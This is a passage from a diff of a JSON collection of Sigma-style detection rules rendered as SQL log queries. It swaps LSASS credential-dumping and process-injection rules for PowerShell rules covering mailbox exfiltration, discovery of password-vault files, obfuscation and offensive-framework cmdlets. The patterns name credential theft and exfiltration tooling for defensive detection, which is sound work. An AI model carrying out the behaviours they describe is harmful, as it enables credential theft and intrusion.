ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%.doc%' ESCAPE '\\' OR ScriptBlockText LIKE '%.docx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.xls%' ESCAPE '\\' OR ScriptBlockText LIKE '%.xlsx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.ppt%' ESCAPE '\\' OR ScriptBlockText LIKE '%.pptx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.rtf%' ESCAPE '\\' OR ScriptBlockText LIKE '%.pdf%' ESCAPE '\\' OR ScriptBlockText LIKE '%.txt%' ESCAPE '\\') AND ScriptBlockText LIKE '%Get-ChildItem%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Recurse %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Include %' ESCAPE '\\')" ], - "filename": "proc_access_win_lsass_memdump_evasion.yml" + "filename": "posh_ps_automated_collection.yml" }, { - "title": "LittleCorporal Generated Maldoc Injection", - "id": "7bdde3bf-2a42-4c39-aa31-a92b3e17afac", + "title": "Suspicious PowerShell Mailbox Export to Share - PS", + "id": "4a241dea-235b-4a7e-8d76-50d817b146c4", "status": "experimental", - "description": "Detects the process injection of a LittleCorporal generated Maldoc.", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002", - "attack.t1055.003" + "attack.exfiltration" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' AND CallTrace LIKE '%:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v2.%' ESCAPE '\\' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Mailbox %' ESCAPE '\\' AND ScriptBlockText LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_access_win_littlecorporal_generated_maldoc.yml" + "filename": "posh_ps_mailboxexport_share.yml" }, { - "title": "WerFault Accassing LSASS", - "id": "e5b33f7d-eb93-48b6-9851-09e1e610b6d7", + "title": "Testing Usage of Uncommonly Used Port", + "id": "adf876b3-f1f8-4aa9-a4e4-a64106feec06", "status": "test", - "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", - "author": "Florian Roth (Nextron Systems)", + "description": "Adversaries may communicate using a protocol and port paring that are typically not associated.\nFor example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443.\n", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.command_and_control", + "attack.t1571" ], "falsepositives": [ - "Actual failures in lsass.exe that trigger a crash dump (unlikely)", - "Unknown cases in which WerFault accesses lsass.exe" + "Legitimate administrative script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Test-NetConnection%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ComputerName %' ESCAPE '\\' AND ScriptBlockText LIKE '%-port %' ESCAPE '\\') AND NOT ((ScriptBlockText LIKE '% 443 %' ESCAPE '\\' OR ScriptBlockText LIKE '% 80 %' ESCAPE '\\')))" ], - "filename": "proc_access_win_lsass_werfault.yml" + "filename": "posh_ps_test_netconnection.yml" }, { - "title": "Malware Shellcode in Verclsid Target Process", - "id": "b7967e22-3d7e-409b-9ed5-cdae3f9243a1", - "status": "test", - "description": "Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro", - "author": "John Lambert (tech), Florian Roth (Nextron Systems)", + "title": "Powershell Sensitive File Discovery", + "id": "7d416556-6502-45b2-9bad-9d2f05f38997", + "status": "experimental", + "description": "Detect adversaries enumerate sensitive files", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.discovery", + "attack.t1083" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\verclsid.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF') AND ((CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%VBE7.DLL%' ESCAPE '\\') OR (SourceImage LIKE '%\\\\Microsoft Office\\\\%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%ls%' ESCAPE '\\' OR ScriptBlockText LIKE '%get-childitem%' ESCAPE '\\' OR ScriptBlockText LIKE '%gci%' ESCAPE '\\') AND ScriptBlockText LIKE '%-recurse%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.pass%' ESCAPE '\\' OR ScriptBlockText LIKE '%.kdbx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.kdb%' ESCAPE '\\'))" ], - "filename": "proc_access_win_malware_verclsid_shellcode.yml" + "filename": "posh_ps_sensitive_file_discovery.yml" }, { - "title": "LSASS Access from Program in Suspicious Folder", - "id": "fa34b441-961a-42fa-a100-ecc28c886725", + "title": "Invoke-Obfuscation Via Stdin - Powershell", + "id": "86b896ba-ffa1-4fea-83e3-ee28a4c915c7", "status": "experimental", - "description": "Detects process access to LSASS memory with suspicious access flags and from a suspicious folder", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate software accessing LSASS process for legitimate reason" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\') AND (SourceImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Temporary%' ESCAPE '\\')) AND NOT ((SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\software\\_reporter\\_tool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\DropboxUpdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebexMTA.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\JetBrains\\\\Toolbox\\\\bin\\\\jetbrains-toolbox.exe' ESCAPE '\\') AND GrantedAccess = '0x410') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\%' ESCAPE '\\') AND (SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1fffff', '0x1010', '0x101010')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vs\\_bootstrapper\\_%' ESCAPE '\\' AND GrantedAccess = '0x1410') OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\GoogleUpdate.exe' ESCAPE '\\' AND GrantedAccess = '0x410') OR ((SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\' AND GrantedAccess = '0x1fffff') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND GrantedAccess = '0x1410')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$\\{?input).*&&.*\"')" ], - "filename": "proc_access_win_susp_proc_access_lsass_susp_source.yml" + "filename": "posh_ps_invoke_obfuscation_via_stdin.yml" }, { - "title": "Mimikatz through Windows Remote Management", - "id": "aa35a627-33fb-4d04-a165-d33b4afca3e8", - "status": "stable", - "description": "Detects usage of mimikatz through WinRM protocol by monitoring access to lsass process by wsmprovhost.exe.", - "author": "Patryk Prauze - ING Tech", + "title": "Detected Windows Software Discovery - PowerShell", + "id": "2650dd1a-eb2a-412d-ac36-83f06c4f2282", + "status": "experimental", + "description": "Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.credential_access", - "attack.execution", - "attack.t1003.001", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006", - "attack.s0002" + "attack.discovery", + "attack.t1518" ], "falsepositives": [ - "Unlikely" + "Legitimate administration activities" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\wsmprovhost.exe' ESCAPE '\\') AND NOT (GrantedAccess = '0x80000000'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%get-itemProperty%' ESCAPE '\\' AND ScriptBlockText LIKE '%\\\\software\\\\%' ESCAPE '\\' AND ScriptBlockText LIKE '%select-object%' ESCAPE '\\' AND ScriptBlockText LIKE '%format-table%' ESCAPE '\\')" ], - "filename": "proc_access_win_mimikatz_trough_winrm.yml" + "filename": "posh_ps_software_discovery.yml" }, { - "title": "Suspicious GrantedAccess Flags on LSASS Access", - "id": "a18dd26b-6450-46de-8c91-9659150cf088", + "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell", + "id": "e55a5195-4724-480e-a77e-3ebe64bd3759", "status": "experimental", - "description": "Detects process access to LSASS memory with suspicious access flags", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate software such as AV and EDR" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\')) AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Malwarebytes\\\\Anti-Malware\\\\MBAMService.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Users\\\\%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\perfmon.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\MRT.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND SourceImage LIKE '%Antivirus%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Common Files\\\\McAfee\\\\MMSSHost\\\\MMSSHOST.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\') AND GrantedAccess = '0x1fffff')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%set%' ESCAPE '\\' AND ScriptBlockText LIKE '%&&%' ESCAPE '\\' AND ScriptBlockText LIKE '%mshta%' ESCAPE '\\' AND ScriptBlockText LIKE '%vbscript:createobject%' ESCAPE '\\' AND ScriptBlockText LIKE '%.run%' ESCAPE '\\' AND ScriptBlockText LIKE '%(window.close)%' ESCAPE '\\')" ], - "filename": "proc_access_win_susp_proc_access_lsass.yml" + "filename": "posh_ps_invoke_obfuscation_via_use_mhsta.yml" }, { - "title": "Potential NT API Stub Patching", - "id": "b916cba1-b38a-42da-9223-17114d846fd6", - "status": "experimental", - "description": "Detects potential NT API stub patching as seen used by the project PatchingAPI", - "author": "frack113", + "title": "Malicious PowerShell Commandlets - ScriptBlock", + "id": "89819aa4-bbd6-46bc-88ec-c7f7fe30efa6", + "status": "test", + "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", + "author": "Sean Metcalf, Florian Roth, Bartlomiej Czyz @bczyz1, oscd.community, Nasreddine Bencherchali, Tim Shelton, Mustafa Kaan Demir, Georg Lauenstein, Max Altgelt, Tobias Michalski, Austin Songer", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.execution", + "attack.discovery", + "attack.t1482", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1069", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (GrantedAccess = '0x1FFFFF' AND CallTrace LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%)' ESCAPE '\\') AND NOT (((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\app-%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\GitHubDesktop.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\resources\\\\app\\\\git\\\\usr\\\\bin\\\\sh.exe' ESCAPE '\\') AND TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\app-%' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\') AND SourceImage LIKE '%\\\\NGenTask.exe' ESCAPE '\\' AND (TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\')) OR ((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\taskhost.exe' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\') AND TargetImage LIKE '%\\\\NGenTask.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\WINDOWS\\\\SysWOW64\\\\regsvr32.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Add-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Check-VM%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR ScriptBlockText LIKE '%Decrypt-Hash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%Exploit-Jboss%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADR%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRCSV%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRExcel%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRHTML%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRJSON%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRXML%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-Fruit%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADIDNS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ChromeDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-FoxDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-GPPPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-IndexedItem%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-KerberosAESKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Keystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LSASecret%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-MachineAccountAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-MachineAccountCreator%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RickAstley%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Screenshot%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServicePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-System%' ESCAPE '\\' OR ScriptBlockText LIKE 